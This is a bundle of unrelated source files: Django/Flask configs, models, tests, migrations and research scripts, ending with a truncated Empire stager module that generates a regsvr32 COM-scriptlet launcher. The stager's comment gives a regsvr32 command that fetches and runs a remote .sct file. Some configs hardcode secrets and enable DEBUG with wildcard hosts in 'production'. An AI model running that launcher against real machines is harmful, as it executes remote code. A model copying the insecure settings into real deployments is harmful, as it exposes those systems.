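# Illustrative lifecycle sketch (the config, sensor list, and file path
# here are hypothetical; Machine itself is abstract and never instantiated):
#
#   machine = PhysicalMachine(machine_config)    # concrete subclass
#   machine.add_sensors(sensor_list)             # attach memory/disk/control/...
#   machine.power_on()
#   machine.memory_dump('/tmp/sut.mem')          # chunked physical-memory dump
#   machine.machine_reset()                      # power off, then disk_revert()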
|
mit-ll/LO-PHI
|
python-lophi/lophi/machine/__init__.py
|
Python
|
bsd-3-clause
| 18,193
|
# -*- coding: utf-8 -*-
'''
Production Configurations
- Use djangosecure
- Use Amazon's S3 for storing static files and uploaded media
- Use sendgrid to send emails
- Use MEMCACHIER on Heroku
'''
from configurations import values
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
try:
from S3 import CallingFormat
AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
except ImportError:
    # TODO: Fix this; this module is imported (and this class constructed) even in Dev.
pass
from .common import Common
class Production(Common):
DEBUG = True
# INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
# END INSTALLED_APPS
# SECRET KEY
SECRET_KEY = "Change me" # values.SecretValue()
# END SECRET KEY
# django-secure
# INSTALLED_APPS += ("djangosecure", )
# set this to 60 seconds and then to 518400 when you can prove it works
# SECURE_HSTS_SECONDS = 60
# SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)
# SECURE_FRAME_DENY = values.BooleanValue(True)
# SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)
# SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)
# SESSION_COOKIE_SECURE = values.BooleanValue(False)
# SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)
# SECURE_SSL_REDIRECT = values.BooleanValue(True)
# end django-secure
# SITE CONFIGURATION
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ["*"]
# END SITE CONFIGURATION
INSTALLED_APPS += ("gunicorn", )
# CACHING
# Only do this here because thanks to django-pylibmc-sasl and pylibmc
# memcacheify is painful to install on windows.
try:
# See: https://github.com/rdegges/django-heroku-memcacheify
from memcacheify import memcacheify
CACHES = memcacheify()
except ImportError:
CACHES = values.CacheURLValue(default="memcached://127.0.0.1:11211")
# END CACHING
# Your production stuff: Below this line define 3rd party library settings
|
garry-cairns/correspondence
|
api/correspondence/config/production.py
|
Python
|
bsd-3-clause
| 2,091
|
from django.utils.translation import ugettext_lazy as _
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
PROPERTY_LABELS = (
('home', _('home')),
('work', _('work')),
('other', _('other')),
)
IM_SERVICES = (
('google', _('Google Talk')),
('aim', _('AIM')),
('yahoo', _('Yahoo')),
('msn', _('MSN')),
('icq', _('ICQ')),
('jabber', _('Jabber')),
)
class PrimaryPropertyManager(models.Manager):
def primary(self):
try:
return self.get_queryset().get(is_primary=True)
except ObjectDoesNotExist:
return None
# Base classes
# Every contact property must inherit from either ContactProperty or
# PrimaryProperty
class ContactProperty(models.Model):
class Meta:
abstract = True
def save(self, *args, **kwargs):
self.contact.save()
models.Model.save(self, *args, **kwargs)
class PrimaryProperty(ContactProperty):
is_primary = models.BooleanField(_("primary"), default=False)
objects = PrimaryPropertyManager()
class Meta:
abstract = True
def save(self, *args, **kwargs):
update_primary = kwargs.pop('update_primary', True)
if update_primary:
try:
existing = self.__class__.objects.exclude(pk=self.id) \
.filter(contact=self.contact,
is_primary=True).get()
except ObjectDoesNotExist:
existing = None
if self.is_primary:
if existing is not None:
existing.is_primary = False
existing.save(update_primary=False)
elif existing is None:
self.is_primary = True
super(PrimaryProperty, self).save(*args, **kwargs)
# Mixin classes
# Abstracts out common fields and methods; models can implement this for
# themselves if different.
class LabeledProperty(models.Model):
label = models.CharField(_("label"), max_length=200, choices=PROPERTY_LABELS)
class Meta:
abstract = True
def __unicode__(self):
return u'%s [%s]' % (self.value, LabeledProperty.get_label_display(self))
class NamedProperty(models.Model):
name = models.CharField(_("name"), max_length=200)
class Meta:
abstract = True
def __unicode__(self):
return u'%s: %s' % (self.name, self.value)
class OptionalNamedProperty(models.Model):
name = models.CharField(_("name"), max_length=200, blank=True)
class Meta:
abstract = True
def __unicode__(self):
return u'%s%s' % (self.name and '%s: ' % self.name or "", self.value)
# Contact properties
class PrimaryPropertyDescriptor(object):
def __init__(self, collection_name):
self.collection_name = collection_name
def get_collection(self, instance):
return getattr(instance, self.collection_name)
def __get__(self, instance, owner):
if instance is None:
return self
return self.get_collection(instance).primary()
def __set__(self, instance, value):
value.is_primary = True
self.get_collection(instance).add(value)
    def __delete__(self, instance):
        primary = self.get_collection(instance).primary()
        if primary is not None:
            primary.delete()
        # Promote the first remaining property (if any) to primary.
        for obj in self.get_collection(instance).all():
            obj.is_primary = True
            obj.save(update_primary=False)
            return
class CustomField(ContactProperty, NamedProperty):
contact = models.ForeignKey('Contact', related_name="custom_fields")
value = models.TextField(_("value"))
def __unicode__(self):
return u'%s: %s' % (self.name, self.value)
class Date(ContactProperty, NamedProperty):
contact = models.ForeignKey('Contact', related_name="dates")
value = models.DateField(_("date"))
class Meta:
verbose_name = _("date")
verbose_name_plural = _("dates")
class EmailAddress(PrimaryProperty, LabeledProperty, OptionalNamedProperty):
contact = models.ForeignKey('Contact', related_name="email_addresses")
value = models.EmailField(_("address"))
class Meta:
verbose_name = _("email address")
verbose_name_plural = _("email addresses")
class IMAccount(PrimaryProperty):
contact = models.ForeignKey('Contact', related_name="im_accounts")
service = models.CharField(_("service"), max_length=30, choices=IM_SERVICES)
account = models.CharField(_("account"), help_text=_("user name or email address"), max_length=200)
class Meta:
verbose_name = _("IM account")
verbose_name_plural = _("IM accounts")
@property
def value(self):
return self.account
class Link(ContactProperty, NamedProperty):
contact = models.ForeignKey('Contact', related_name="links")
value = models.URLField(_('URL'), max_length=200, default='http://')
class Meta:
verbose_name = _("link")
verbose_name_plural = _("links")
def save(self, *args, **kwargs):
if self.value == 'http://':
return
super(Link, self).save(*args, **kwargs)
class Organization(PrimaryProperty):
contact = models.ForeignKey('Contact', related_name="organizations")
name = models.CharField(_("name"), max_length=200)
title = models.CharField(_("title"), max_length=200, blank=True)
class Meta:
verbose_name = _("organization")
verbose_name_plural = _("organizations")
def __unicode__(self):
return self.name
class PhoneNumber(PrimaryProperty, OptionalNamedProperty):
PHONE_NUM_LABELS = (
('landline', _('landline')),
('mobile', _('mobile')),
('fax', _('fax')),
)
contact = models.ForeignKey('Contact', related_name="phone_numbers")
label = models.CharField(_("label"), max_length=200, choices=PHONE_NUM_LABELS)
value = models.CharField(_('number'), max_length=100)
class Meta:
verbose_name = _("phone number")
verbose_name_plural = _("phone numbers")
def __unicode__(self):
return u'%s%s [%s]' % (self.name and "%s: " % self.name or "",
self.value, PhoneNumber.get_label_display(self))
class PostalAddress(PrimaryProperty, LabeledProperty):
contact = models.ForeignKey('Contact', related_name="postal_addresses")
address1 = models.CharField(_("address line 1"), max_length=127, blank=False)
address2 = models.CharField(_("address line 2"), max_length=127, blank=True)
city = models.CharField(_("city"), max_length=127, blank=True)
state = models.CharField(_("state/province/region"), max_length=127, blank=True)
country = models.CharField(_("country"), max_length=127)
postcode = models.CharField(_("postal code/zip code"), max_length=31, blank=True)
class Meta:
verbose_name = _("postal address")
verbose_name_plural = _("postal addresses")
@property
def value(self):
data = [self.address1, self.address2, self.city,
self.state, self.country, self.postcode]
return ", ".join([i for i in data if i])
class Contact(models.Model):
""" A person or company.
"""
name = models.CharField(max_length=200)
is_company = models.BooleanField(_("company"), default=False)
photo = models.ImageField(_("photo"), upload_to='var/addressbook/photos', blank=True)
notes = models.TextField(_("notes"), blank=True)
date_created = models.DateTimeField(auto_now_add=True, editable=False)
date_updated = models.DateTimeField(auto_now=True, editable=False)
class Meta:
verbose_name = _("contact")
verbose_name_plural = _("contacts")
ordering = ('name',)
def __unicode__(self):
return self.name
    # primary contact properties
email_address = PrimaryPropertyDescriptor('email_addresses')
im_account = PrimaryPropertyDescriptor('im_accounts')
company = PrimaryPropertyDescriptor('organizations')
phone_number = PrimaryPropertyDescriptor('phone_numbers')
postal_address = PrimaryPropertyDescriptor('postal_addresses')
@property
def address(self):
return self.postal_address
class Group(models.Model):
name = models.CharField(max_length=200, unique=True)
description = models.TextField(_("description"), blank=True)
members = models.ManyToManyField(Contact, verbose_name=_("members"), blank=True)
class Meta:
verbose_name = _("group")
verbose_name_plural = _("groups")
@property
def member_list(self):
return ', '.join([str(c) for c in self.members.all()[:5]])
def __unicode__(self):
return self.name
|
Saviq/django-addressbook
|
addressbook/models.py
|
Python
|
bsd-3-clause
| 8,986
|
from django.views.generic.list import ListView
from pari.article.common import get_result_types
from .models import get_search_results
class SearchList(ListView):
context_object_name = "results"
template_name = 'search/search_list.html'
def get_queryset(self):
query = self.request.GET.get("query")
filter = self.request.GET.get("filter")
page = self.request.GET.get("page", 1)
return get_search_results(query, filter, page)
def get_context_data(self, **kwargs):
context = super(SearchList, self).get_context_data(**kwargs)
filter = self.request.GET.get('filter')
context['filter'] = filter
context['result_types'] = get_result_types(filter)
context['query'] = self.request.GET.get('query')
return context
|
RuralIndia/pari
|
pari/search/views.py
|
Python
|
bsd-3-clause
| 808
|
'''
Created on Apr 25, 2014
@author: sstober
'''
import os;
import sys;
import logging;
log = logging.getLogger(__name__);
from deepthought.experiments.ismir2014.util import load_config;
from deepthought.util.config_util import merge_params;
from deepthought.experiments.ismir2014.train_convnet import train_convnet
# from deepthought.experiments.ismir2014.plot import plot2;
# from concurrent.futures import ThreadPoolExecutor;
# NOTE: ProcessPoolExecutor does not work with GPU / CUDA
def dummy():
for x in xrange(10000):
x**x;
log.info('done');
def run(params):
try:
log.debug('running {}'.format(params.experiment_root));
# dummy();
train_convnet(params);
# plot2(config.experiment_root);
except:
        log.fatal("Unexpected error: %s", sys.exc_info());
if __name__ == '__main__':
config = load_config(default_config=
os.path.join(os.path.dirname(__file__),'train_fftconvnet.cfg'), reset_logging=True);
lr_values = config.get('lr_values', [0.001, 0.0033, 0.01, 0.00033, 0.033, 0.1]);
beat_patterns = config.get('beat_patterns', [10,20,30]);
bar_patterns = config.get('bar_patterns', [10,20,30]);
beat_pools = config.get('beat_pools', [1,3,5]);
bar_pools = config.get('bar_pools', [1,3,5]);
# with ThreadPoolExecutor(max_workers=config.num_processes) as executor:
for lr in lr_values:
for h1pat in bar_patterns:
for h1pool in bar_pools:
for h0pat in beat_patterns:
for h0pool in beat_pools:
# collect params
exp_str = 'lr{}/h1pool{}/h1pat{}/h0pool{}/h0pat{}'.format(lr,h1pool,h1pat,h0pool,h0pat);
hyper_params = {
'experiment_root' : os.path.join(config.experiment_root, exp_str),
'learning_rate' : lr,
'beat_pool_size' : h0pool,
'num_beat_patterns' : h0pat,
'bar_pool_size' : h1pool,
'num_bar_patterns' : h1pat,
};
params = merge_params(config, hyper_params);
# check if directory already exists
if os.path.exists(os.path.join(params.experiment_root, 'epochs')):
print 'Already done: '+params.experiment_root;
continue;
# executor.submit(run, params);
run(params);
|
sstober/deepthought
|
deepthought/experiments/ismir2014/hyper_search_cnn.py
|
Python
|
bsd-3-clause
| 2,756
|
"""Utility functions"""
from datetime import datetime
from uuid import uuid4
import pytz
def create_message_structure(content, sender, message_type):
"""
Creates a message dictionary
Args:
content (str): a string representing a message
sender (str): a string representing the sender
message_type (str): a string representing the message type
Returns:
        tuple: a tuple containing a dictionary with info about a chat message
            and a datetime object
"""
raw_timestamp = datetime.now(tz=pytz.UTC)
message = {
'id': uuid4().hex,
'content': content,
'timestamp': raw_timestamp.isoformat(),
'sender': sender,
'message_type': message_type,
}
return message, raw_timestamp
def create_user_message(content, sender):
"""
    Shortcut for create_message_structure for user messages
Args:
content (str): a string representing a message
sender (str): a string representing the sender
Returns:
        tuple: a tuple containing a dictionary with info about a chat message
            and a datetime object
"""
return create_message_structure(content, sender, message_type='user_message')
def create_system_message(content):
"""
    Shortcut for create_message_structure for system messages
Args:
content (str): a string representing a message
Returns:
        tuple: a tuple containing a dictionary with info about a chat message
            and a datetime object
"""
return create_message_structure(content, sender='system', message_type='notification')
def serialize_pagination(pagination_obj):
"""
    Returns a dictionary serialization of a SQLAlchemy pagination object.
Args:
pagination_obj (flask.ext.sqlalchemy.Pagination): a pagination object
Returns:
dict: the serialization of the pagination object
"""
return {
'items': [item.to_json() for item in pagination_obj.items],
'current_page': pagination_obj.page,
'next_page': pagination_obj.next_num,
'prev_page': pagination_obj.prev_num,
'total_pages': pagination_obj.pages,
'total_number_items': pagination_obj.total,
}
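# Minimal usage sketch (hypothetical, not part of the original module):
# build one user message and one system notification and inspect them.
if __name__ == '__main__':
    msg, ts = create_user_message('hello world', sender='alice')
    note, _ = create_system_message('alice joined the room')
    print(msg['id'], msg['timestamp'], msg['message_type'])
    print(note['sender'], note['message_type'])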
|
giocalitri/calichat
|
calichat/utils.py
|
Python
|
bsd-3-clause
| 2,241
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.contrib.auth import get_user_model
from django.test import TestCase
from example.models import Customer
class UserManagerTest(TestCase):
user_email = 'user@example.com'
user_password = 'pa$sw0Rd'
def test_create_user(self):
user = get_user_model().objects.create_user(self.user_email)
self.assertEqual(user.email, self.user_email)
self.assertFalse(user.has_usable_password())
self.assertTrue(user.is_active)
self.assertFalse(user.is_staff)
self.assertFalse(user.is_superuser)
def test_create_superuser(self):
user = get_user_model().objects.create_superuser(
self.user_email, self.user_password)
self.assertEqual(user.email, self.user_email)
        self.assertTrue(user.check_password(self.user_password))
self.assertTrue(user.is_active)
self.assertTrue(user.is_staff)
self.assertTrue(user.is_superuser)
def test_inactive_user_creation(self):
# Create deactivated user
user = get_user_model().objects.create_user(
self.user_email, self.user_password, is_active=False)
self.assertFalse(user.is_active)
def test_staff_user_creation(self):
# Create staff user
user = get_user_model().objects.create_user(
self.user_email, self.user_password, is_staff=True)
self.assertTrue(user.is_staff)
def test_empty_username(self):
self.assertRaises(ValueError, get_user_model().objects.create_user, email='')
def test_automatic_downcasting_of_inherited_user_models(self):
get_user_model().objects.create_superuser(
self.user_email, self.user_password)
Customer.objects.create_user('customer@example.com', 'cu$t0meR')
self.assertQuerysetEqual(
get_user_model().objects.all(),
['<User: user@example.com>', '<Customer: customer@example.com>'], ordered=False)
|
mishbahr/django-users2
|
tests/test_managers.py
|
Python
|
bsd-3-clause
| 1,983
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'TaskHistory.db_id'
db.delete_column(u'notification_taskhistory', 'db_id_id')
def backwards(self, orm):
# Adding field 'TaskHistory.db_id'
db.add_column(u'notification_taskhistory', 'db_id',
self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'database', null=True, to=orm['logical.Database'], on_delete=models.SET_NULL, blank=True),
keep_default=False)
models = {
u'notification.taskhistory': {
'Meta': {'object_name': 'TaskHistory'},
'arguments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'context': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'ended_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'task_id': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'task_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'task_status': ('django.db.models.fields.CharField', [], {'default': "u'PENDING'", 'max_length': '100', 'db_index': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['notification']
|
globocom/database-as-a-service
|
dbaas/notification/migrations/0007_auto__del_field_taskhistory_db_id.py
|
Python
|
bsd-3-clause
| 2,089
|
# -*- coding: UTF-8 -*-
from datetime import date
from apps.seguridad.decorators import login_required, credential_required
from apps.reportes.models import Reporte
@login_required
@credential_required('reg_establecimiento_consulta')
def establecimientos(request, q):
filename = 'establecimientos_' + str(date.today()) + '.xls'
reporte = Reporte(headers=['REGION', 'JURISDICCIÓN', 'CUE', 'DEPENDENCIA FUNCIONAL', 'NOMBRE', 'DEPARTAMENTO', 'LOCALIDAD', 'ESTADO', 'VERIFICADO'], filename=filename)
for est in q:
try:
localidad = est.get_first_domicilio().localidad
departamento = localidad.departamento.nombre
localidad = localidad.nombre
except AttributeError:
localidad = ''
departamento = ''
if est.estado is None:
estado_nombre = ''
else:
estado_nombre = est.estado.nombre.encode('utf8')
reporte.rows.append([est.dependencia_funcional.jurisdiccion.region.nombre.encode('utf8'), est.dependencia_funcional.jurisdiccion.nombre.encode('utf8'),\
est.cue, est.dependencia_funcional.nombre.encode('utf8'), est.nombre.encode('utf8'), departamento.encode('utf8'), localidad.encode('utf8'), estado_nombre,
"SI" if est.verificado() else "NO"])
return reporte.as_csv()
|
MERegistro/meregistro
|
meregistro/apps/reportes/views/establecimiento.py
|
Python
|
bsd-3-clause
| 1,400
|
from nose.tools import assert_true, assert_false, assert_equals
from pygow import validation, maybe
def multBy(x):
def k(y):
return x * y
return k
def divBy(x):
def k(y):
if (x == 0):
return validation.Invalid(['doh'])
else:
return validation.Valid(y / x)
return k
def test_eq():
assert_true(validation.Valid(42).__eq__(validation.Valid(42)))
assert_false(validation.Valid(42).__eq__(validation.Valid(1)))
assert_true(validation.Invalid(['doh']).__eq__(validation.Invalid(['doh'])))
assert_false(validation.Valid(42).__eq__(validation.Invalid(['doh'])))
def test_ne():
assert_false(validation.Valid(42).__ne__(validation.Valid(42)))
assert_true(validation.Valid(42).__ne__(validation.Valid(1)))
assert_false(validation.Invalid(['doh']).__ne__(validation.Invalid(['doh'])))
assert_true(validation.Valid(42).__ne__(validation.Invalid(['doh'])))
def test_str():
assert_equals('Valid(42)', str(validation.Valid(42)))
assert_equals('Invalid([\'doh\'])', str(validation.Invalid(['doh'])))
def test_is_valid():
assert_true(validation.Valid(42).is_valid())
assert_false(validation.Invalid(['doh']).is_valid())
def test_map():
assert_equals(validation.Valid(42), validation.Valid(6).map(multBy(7)))
assert_equals(validation.Invalid(['doh']), validation.Invalid(['doh']).map(multBy(7)))
def test_flat_map():
assert_equals(validation.Valid(6), validation.Valid(42).flat_map(divBy(7)))
assert_equals(validation.Invalid(['doh']), validation.Invalid(['doh']).flat_map(divBy(7)))
def test_get_required_env():
assert_true(validation.get_required_env('HOME').is_valid())
assert_false(validation.get_required_env('THIS_AINT_AN_ENV_VAR').is_valid())
def test_to_maybe():
assert_equals(maybe.Just(42), validation.Valid(42).to_maybe())
assert_equals(maybe.Nothing(), validation.Invalid(['nope']).to_maybe())
a_v = validation.Valid('a')
a_i = validation.Invalid(['invalid: a'])
def test_lift_a():
def append(a):
return a
assert_equals(
validation.Valid('a'),
validation.lift_a(append).ap(a_v)
)
b_v = validation.Valid('b')
b_i = validation.Invalid(['invalid: b'])
def test_lift_a2():
def append_2(a, b):
return a + b
assert_equals(
validation.Valid('ab'),
validation.lift_a2(append_2).ap(a_v).ap(b_v)
)
assert_equals(
validation.Invalid(['invalid: a']),
validation.lift_a2(append_2).ap(a_i).ap(b_v)
)
assert_equals(
validation.Invalid(['invalid: b']),
validation.lift_a2(append_2).ap(a_v).ap(b_i)
)
assert_equals(
validation.Invalid(['invalid: a', 'invalid: b']),
validation.lift_a2(append_2).ap(a_i).ap(b_i)
)
c_v = validation.Valid('c')
def test_lift_a3():
def append_3(a, b, c):
return a + b + c
assert_equals(
validation.Valid('abc'),
validation.lift_a3(append_3).ap(a_v).ap(b_v).ap(c_v)
)
def test_lift_a4():
def append_4(a, b, c, d):
return a + b + c + d
assert_equals(
validation.Valid('abca'),
validation.lift_aN(4, append_4).ap(a_v).ap(b_v).ap(c_v).
ap(a_v)
)
def test_lift_a9():
def append_9(a, b, c, d, e, f, g, h, i):
return a + b + c + d + e + f + g + h + i
assert_equals(
validation.Valid('abcabcabc'),
validation.lift_aN(9, append_9).ap(a_v).ap(b_v).ap(c_v).
ap(a_v).ap(b_v).ap(c_v).
ap(a_v).ap(b_v).ap(c_v)
)
def test_lift_a0():
def append(a):
return a
assert_equals(
validation.Invalid(["n must be positive in lift_aN(n, f)"]),
validation.lift_aN(0, append).ap(a_v)
)
|
udacity/pygow
|
tests/test_validation.py
|
Python
|
bsd-3-clause
| 3,827
|
import os
import production_settings
BASEDIR = os.path.abspath(os.path.dirname(__file__))
class Config:
DEBUG = False
TESTING = False
SECRET_KEY = 'im!mx2m(69)b^7n3j!yi)k!a7n(^09=^&*+pnan78hl^%_yp4u'
CSRF = True
CSRF_SECRET = 'im!mx2m(69)b^7n3j!yi)k!a7n(^09=^&*+pnan78hl^%_yp4u'
JSONIFY_PRETTYPRINT_REGULAR = False
UPLOAD_FOLDER = os.path.join(BASEDIR, 'media')
IMG_MIMES = {
'image/jpeg',
'image/png',
'image/gif',
}
DOC_MIMES = {
'application/vnd.openxmlformats-officedocument'
'.wordprocessingml.document', # .docx
'application/msword', # .doc
'application/pdf', # .pdf
'text/plain', # .txt
'application/vnd.openxmlformats-officedocument'
'.presentationml.presentation', # .pptx
'application/vnd.ms-powerpoint', # .ppt
'application/rtf', # .rtf
}
ALLOWED_MIMES = IMG_MIMES | DOC_MIMES
MAX_CONTENT_LENGTH = 15 * 1024 * 1024
FIXTURES_DIR = os.path.join(BASEDIR, 'fixtures')
# Celery
CELERY_IMPORTS = (
"project.tasks.mail",
"project.tasks.uploads",
)
CELERY_BROKER_URL = 'redis://localhost:6379/0'
CELERY_BACKEND_URL = CELERY_BROKER_URL
# Email
MAIL_SERVER = 'smtp.yandex.ru'
MAIL_PORT = 465
MAIL_USE_SSL = True
MAILS_TO_SEND = ['hrportal@yandex.ru']
MAIL_USERNAME = 'hrportal@yandex.ru'
MAIL_PASSWORD = 'useaverystrongpasswordLuke'
MAIL_DEFAULT_SENDER = 'hrportal@yandex.ru'
# Logger configuration
LOG_CONFIG = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'level': 'INFO',
'formatter': 'detailed',
'stream': 'ext://sys.stdout',
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'level': 'INFO',
'formatter': 'detailed',
'filename': '/tmp/junk.log',
'mode': 'a',
'maxBytes': 10485760,
'backupCount': 5,
},
},
'formatters': {
'detailed': {
'format': '%(asctime)s %(module)-17s line:%(lineno)-4d '
'%(levelname)-8s %(message)s',
},
'email': {
'format': 'Timestamp: %(asctime)s\nModule: %(module)s\n'
'Line: %(lineno)d\nMessage: %(message)s',
},
},
'loggers': {
'extensive': {
'level': 'DEBUG',
'handlers': [
'file',
],
},
},
'root': {
'level': 'INFO',
'handlers': [
'console',
]
}
}
class ProductionConfig(Config):
# Database
SQLALCHEMY_DATABASE_URI = production_settings.SQLALCHEMY_DATABASE_URI
UPLOAD_FOLDER = production_settings.UPLOAD_FOLDER
# Celery
CELERY_BROKER_URL = production_settings.CELERY_BROKER_URL
CELERY_BACKEND_URL = production_settings.CELERY_BACKEND_URL
# Email
MAIL_SERVER = production_settings.MAIL_SERVER
MAIL_PORT = production_settings.MAIL_PORT
MAIL_USE_SSL = production_settings.MAIL_USE_SSL
MAIL_USERNAME = getattr(production_settings, "MAIL_USERNAME", None)
MAIL_PASSWORD = getattr(production_settings, "MAIL_PASSWORD", None)
MAIL_DEFAULT_SENDER = production_settings.MAIL_DEFAULT_SENDER
class DevelopmentConfig(Config):
# Flask
DEBUG = True
DEVELOPMENT = True
SQLALCHEMY_ECHO = True
# Database
SQLALCHEMY_DATABASE_URI = 'postgresql://root:qwerty@localhost/hrportal'
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite://'
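# Hypothetical usage sketch (not part of this file): how a Flask app factory
# might select one of these classes; `create_app` is a placeholder name.
#
#   from flask import Flask
#
#   def create_app(config_class=DevelopmentConfig):
#       app = Flask(__name__)
#       app.config.from_object(config_class)
#       return app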
|
saklar13/Meowth
|
config.py
|
Python
|
bsd-3-clause
| 3,882
|
SIZEOF_DOUBLE = 8
ONE_MIB = 1048576
NC = 4080
MY_NC = 2040
LC = 256
MY_KC = 252
KC = 256
MC = 72
MR = 6
NR = 8
def panel_matrix_entries(dim, other_dim, panel_dim):
n_panels = dim // panel_dim
if n_panels * panel_dim < dim:
n_panels += 1
return (n_panels + 1) * panel_dim * other_dim
def memory_mine(m, n, k, l, nc=MY_NC, kc=MY_KC,
lc=LC, mc=MC,
mr=MR, nr=NR):
tmp_matrix = panel_matrix_entries(min(n, nc), min(k, kc), nr)
outer_l2 = panel_matrix_entries(min(m, mc), min(k, kc), mr)
inner_l3 = panel_matrix_entries(min(n, nc), min(l, lc), nr)
inner_l2 = panel_matrix_entries(min(k, mc), min(l, lc), mr)
kernels = 2 * mr * nr
total_allocs = tmp_matrix + outer_l2 + inner_l3 + inner_l2 + kernels
return (total_allocs * SIZEOF_DOUBLE) / ONE_MIB
def memory_goto(m, n, k, l, nc=NC, kc=KC, mc=MC, mr=MR, nr=NR):
tmp_matrix = k * n
outer_l3 = panel_matrix_entries(min(n, nc), min(k, kc), nr)
outer_l2 = panel_matrix_entries(min(m, mc), min(k, kc), mr)
inner_l3 = panel_matrix_entries(min(n, nc), min(l, kc), nr)
inner_l2 = panel_matrix_entries(min(k, mc), min(l, kc), mr)
kernels = 2 * mr * nr
total_allocs = (tmp_matrix + outer_l3 + outer_l2
+ inner_l3 + inner_l2 + kernels)
return (total_allocs * SIZEOF_DOUBLE) / ONE_MIB
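# Hypothetical usage sketch (not in the original file): compare the working
# set of the two packing strategies, in MiB, for one sample problem size.
if __name__ == '__main__':
    m = n = k = l = 4000
    print('mine: %.2f MiB' % memory_mine(m, n, k, l))
    print('goto: %.2f MiB' % memory_goto(m, n, k, l))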
|
krzysz00/momms
|
results/memory_usage.py
|
Python
|
bsd-3-clause
| 1,355
|
"""Creates the guests table
Revision ID: 38dbe9301b4c
Revises: 6451c45cc96d
Create Date: 2016-04-21 09:38:28.846577
"""
# revision identifiers, used by Alembic.
revision = '38dbe9301b4c'
down_revision = '6451c45cc96d'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('guests',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('host_id', sa.Integer(), nullable=False),
sa.Column('party_id', sa.Integer(), nullable=False),
sa.Column('is_at_party', sa.Boolean(), nullable=False),
sa.ForeignKeyConstraint(['host_id'], ['users.id'], ),
sa.ForeignKeyConstraint(['party_id'], ['parties.id'], ),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('guests')
### end Alembic commands ###
|
Rdbaker/WPI-IFC
|
migrations/versions/38dbe9301b4c_.py
|
Python
|
bsd-3-clause
| 1,001
|
from optparse import make_option
from django.core.management.base import LabelCommand
class Command(LabelCommand):
help = "Generate Sphinx documentation skeleton for given models."
option_list = LabelCommand.option_list + (
make_option('--locale', '-l', default=None, dest='locale',
                    help='Activate given locale; verbose names for models and '
                         'attributes will be in the given locale.'),
)
def handle_label(self, label, **options):
locale = options.get('locale', None)
if locale:
from django.utils import translation
translation.activate(locale)
from django.db import models
from simpleadmindoc.util import get_model
from simpleadmindoc.generate import model_doc
print model_doc(get_model(*label.split('.')))
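# Example invocation (the app.Model label is a placeholder; --locale/-l is
# the option defined above):
#
#   python manage.py docgenmodel myapp.MyModel --locale=de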
|
bmihelac/django-simpleadmindoc
|
simpleadmindoc/management/commands/docgenmodel.py
|
Python
|
bsd-3-clause
| 849
|
from unittest import mock
from bfg9000.builtins.install import installify
from bfg9000.path import Root
from .. import *
class MockInstallOutputs:
class Mapping:
def __init__(self, env=None, bad=set()):
self.env = env
self.bad = bad
def __getitem__(self, key):
if key.path.root == Root.absolute or key in self.bad:
raise KeyError(key)
return installify(key, cross=self.env)
def __init__(self, env, bad=set()):
        self.host = self.Mapping(bad=bad)
self.target = self.Mapping(env, bad)
class ToolTestCase(CrossPlatformTestCase):
def __init__(self, *args, **kwargs):
super().__init__(clear_variables=True, *args, **kwargs)
def setUp(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.tool = self.tool_type(self.env)
|
jimporter/bfg9000
|
test/unit/tools/__init__.py
|
Python
|
bsd-3-clause
| 882
|
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'regsvr32',
'Author': ['@subTee', '@enigma0x3'],
            'Description': ('Generates an sct file (COM Scriptlet). Host this anywhere.'),
'Comments': [
'On the endpoint simply launch regsvr32 /u /n /s /i:http://server/file.sct scrobj.dll '
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'StagerRetries': {
'Description': 'Times for the stager to retry connecting.',
'Required': False,
'Value': '0'
},
'Base64' : {
'Description' : 'Switch. Base64 encode the output.',
'Required' : True,
'Value' : 'True'
},
'OutFile': {
'Description': 'File to output SCT to, otherwise displayed on the screen.',
'Required': False,
'Value': '/tmp/launcher.sct'
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
